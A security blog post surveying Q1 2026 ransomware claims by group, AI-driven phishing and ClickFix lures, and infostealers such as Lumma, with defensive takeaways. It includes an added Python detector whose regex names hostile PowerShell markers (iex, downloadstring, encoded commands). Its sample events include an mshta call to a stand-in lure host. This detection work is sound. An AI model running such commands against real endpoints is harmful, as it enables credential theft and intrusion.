
    Q1 2026 Threat Landscape: The Pace Has Not Slowed

    James McMurry, March 9, 2026, 10 min read

    We are 68 days into 2026. I want to put the current threat landscape in context because the numbers are not getting better and the methods are not getting simpler. This is a look at what ransomware, phishing, and malware activity actually looked like this quarter to date, where the trends are heading, and what it means if you are responsible for defending an organization.

    Ransomware

    We tracked 2,522 ransomware claims from January 1 through March 9, 2026. That is more than 37 claims per day across 81 distinct groups. For context, Q1 2025 produced approximately 2,063 victims by most tracking estimates, and Q1 2025 was itself described at the time as the worst quarter on record, more than double Q1 2024. The pace has not slowed.

    Qilin leads Q1 2026 by a wide margin at 405 claims. Akira follows at 173, LockBit 5.0 at 172, Gentlemen at 159, and PLAY at 145. Volume alone does not tell the whole story. What matters operationally is follow-through: did the data actually come out?

    Top 5 Most Active Groups, Q1 2026

    Group          Claims
    Qilin          405
    Akira          173
    LockBit 5.0    172
    Gentlemen      159
    PLAY           145

    Two-thirds of all claims this quarter, 1,714 out of 2,522, did not result in publicly released data. That number needs careful interpretation. No release does not mean no damage. It could mean the group is running a pressure campaign with no real leverage. It could mean negotiations are still active. It could mean the victim paid and the group deleted the data as agreed. Payment shows up in the data as silence, not as a release. A 0% release rate tells you nothing by itself about whether the group is effective.

    CL0P made 108 claims this quarter with zero releases. Everest made 52 with zero releases. Whether those numbers reflect successful extortion, empty threats, or ongoing negotiations is something the raw data cannot answer.

    On the other end are groups that publish data at very high rates. SAFEPAY releases 85% of the time. Rhysida is at 82%. PLAY combines high volume with 66% follow-through, 95 releases from 145 claims. If one of these groups names your organization, the probability of public exposure is real.

    Groups Most Likely to Release Data

    Group          Release Rate
    SAFEPAY        85%
    Rhysida        82%
    PLAY           66%

    Nine organizations this quarter were claimed by two or more separate groups. That pattern points to one of two things. The initial access was sold or shared after the first breach and a second group walked in through the same door. Or the first incident was never fully remediated. Either way, the victim is being targeted by a completely independent operation using a path that was never closed. Containment without root cause identification is not remediation.

    213 claims used only URLs or redacted victim names, which typically indicates active negotiations. Those are organizations currently in the middle of the process, running down whether the threat is credible, deciding what to do next.

    Phishing

    Phishing is no longer the simple email with a bad link that it used to be. The mechanics have changed significantly. AI has solved the attacker's scale-versus-quality problem. Generating thousands of highly personalized lures that reference real names, real relationships, and recent activity now takes minutes. The Anti-Phishing Working Group recorded over one million phishing attacks in Q1 2025, and volume continued climbing through Q2 and Q3. The trend has not reversed heading into Q1 2026.

    Business email compromise remains the dominant form. In 2025, BEC made up more than half of all phishing attacks. It works because it does not look like phishing. It looks like a routine request from someone the target already trusts. Finance teams are being hit with coordinated attacks combining an initial email followed by a deepfake voice call using the CFO's cloned voice. Two channels, two points of apparent legitimacy, one wire transfer.

    The delivery mechanism keeps expanding. Attackers are no longer dependent on email. Vishing attacks increased 28% in 2024. Smishing rose 22% in the same period. QR code phishing is growing in corporate environments because QR codes bypass most email scanning entirely. The attack arrives through one channel and executes through another. Layered defenses built around email inspection alone are not enough.

    The technique seeing the most deployment right now is ClickFix. It presents the user with a fake CAPTCHA or error message that instructs them to manually paste a command into their terminal or run dialog. The user executes the payload themselves, bypassing browser protections and endpoint controls that would have caught an automated download. It is effective because it turns the user into the execution engine. It is also the primary delivery mechanism for Lumma, the most widely deployed infostealer active today.
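The ClickFix pattern above has a distinctive endpoint footprint: the interpreter is launched by the user from the Run dialog, so its parent is explorer.exe rather than a browser or a management agent, and the pasted one-liner carries arguments routine use rarely does. The detector below is an added example, not code from the original post; it runs over constructed Sysmon-style process-creation events (field names, hosts and command lines are assumptions, and the encoded payload is deliberately redacted).

```python
import re

# Interpreters a ClickFix lure typically has the victim launch by hand.
USER_LAUNCHED_INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}
# Command-line traits of a pasted one-liner rather than routine admin use.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?|iex\b|invoke-expression|"
    r"downloadstring|irm\b|invoke-webrequest|https?://)",
    re.IGNORECASE,
)

def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if image in USER_LAUNCHED_INTERPRETERS and parent == "explorer.exe":
        reasons.append("interpreter spawned directly from explorer.exe (Run dialog)")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(event.get("CommandLine", ""))})
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    return len(reasons), reasons

def find_clickfix_candidates(events, min_score=2):
    """Return (host, image, reasons) for events showing both traits."""
    out = []
    for event in events:
        score, reasons = score_event(event)
        if score >= min_score:
            out.append((event["Host"], event["Image"], reasons))
    return out

# Constructed sample events (not real telemetry); payload redacted on purpose.
SAMPLE_EVENTS = [
    {"Host": "ws01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <redacted>"},
    {"Host": "ws02", "ParentImage": r"C:\Windows\explorer.exe",   # user opened a prompt:
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},  # parent only
    {"Host": "ws03", "ParentImage": r"C:\Program Files\Vendor\agent.exe",  # managed agent
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"Host": "ws04", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta.exe https://lure.example.invalid/verify"},
]

if __name__ == "__main__":
    for host, image, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{host}: {image}\n  " + "\n  ".join(reasons))
```

Requiring both traits keeps an ordinary command prompt (ws02) and a managed agent's scripted PowerShell (ws03) out of the alert queue while still catching the pasted lure on ws01 and ws04.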

    AI-generated phishing emails in controlled testing have achieved click rates around 54%, matching the best human-crafted spear phishing. Phishing-as-a-Service platforms now come with AI-driven personalization engines, subscription tiers, and customer support. An attacker no longer needs technical skills to run a sophisticated campaign. They rent one.

    Malware

    If ransomware is the headline and phishing is the delivery, infostealers are the engine running underneath both. Infostealer malware accounted for nearly 62% of all malware incidents tracked in Q1 2025, more than four times the frequency of the next category. That trend has continued into 2026.

    Lumma is currently the most widely deployed infostealer. It operates as Malware-as-a-Service. The buyer gets a command and control panel and handles their own distribution. Lumma is commonly delivered through ClickFix lures and fake software downloads. It targets browser credentials, session cookies, crypto wallets, and cloud tokens. A stolen session cookie bypasses MFA entirely. That is the threat model that matters most right now.

    Microsoft flagged in early 2026 that infostealer campaigns are expanding rapidly beyond Windows into macOS. Cross-platform variants written in Python are accelerating that shift. DigitStealer, MacSync, and AMOS are all active on macOS. The assumption that Mac endpoints carry lower credential theft risk is no longer accurate.

    What infostealers steal feeds everything downstream. A single set of stolen corporate credentials gets sold to an initial access broker, who sells access to a ransomware affiliate, who deploys within days. The connection between an infostealer infection today and a ransomware incident next month is not theoretical. In February 2026, Hudson Rock documented it directly when a Romanian oil pipeline operator was hit by Qilin ransomware after an infostealer infection provided the initial foothold.

    SocGholish is the most common initial access tool in the current landscape. It is delivered through compromised legitimate websites connected to a traffic delivery system. Visitors to those sites receive malware. The access is then sold, most commonly to ransomware operators. It shows up as a normal website visit. There is no phishing email to catch and no attachment to block.

    The VOID#GEIST campaign is worth noting as a case study in how the current threat environment operates. It used multi-stage PowerShell execution, in-memory payloads, and scheduled task persistence across Windows environments. It is also a useful reminder that threat intelligence quality matters as much as threat intelligence volume. Not everything published as confirmed is confirmed. Verify before you operationalize.

    The Through Line

    These three threat categories do not operate independently. Phishing delivers the infostealer. The infostealer steals the credentials. The credentials get sold. The ransomware affiliate uses them to move laterally and deploy. Data gets exfiltrated before encryption. The claim goes up on the leak site. That is the chain, and it is running at scale across 81 active groups at 37-plus claims per day.

    The pace in Q1 2026 shows no meaningful deceleration from Q1 2025. The tooling is more accessible. The attack surface is wider. The methods are more automated. What this requires on the defensive side is not a different philosophy. It requires more complete execution of fundamentals.

    • No released data does not tell you the threat was not real. It could mean the victim paid. Treat every claim as credible until you have evidence otherwise.
    • Group identity changes your response calculus. SAFEPAY releases data 85% of the time. CL0P has released nothing this quarter. Those are not equivalent situations.
    • If you were hit once, assume the access path is still known. Remediation means root cause, not cleanup.
    • Infostealers are the upstream problem for most downstream incidents. Session token theft bypasses MFA. Monitoring for stolen credentials in the wild is not optional.
    • Mac endpoints are not lower risk for credential theft. Cross-platform infostealers are actively deployed and expanding.

    The threat environment in Q1 2026 is a continuation, not a new chapter. The actors have more tools, lower costs, and a wider attack surface. The organizations holding the line are the ones that have closed the credential exposure gap and built detection that does not depend on catching something that looks unusual.

    Ransomware data: January 1, 2026 through March 9, 2026. 2,522 total claims tracked across 81 active groups.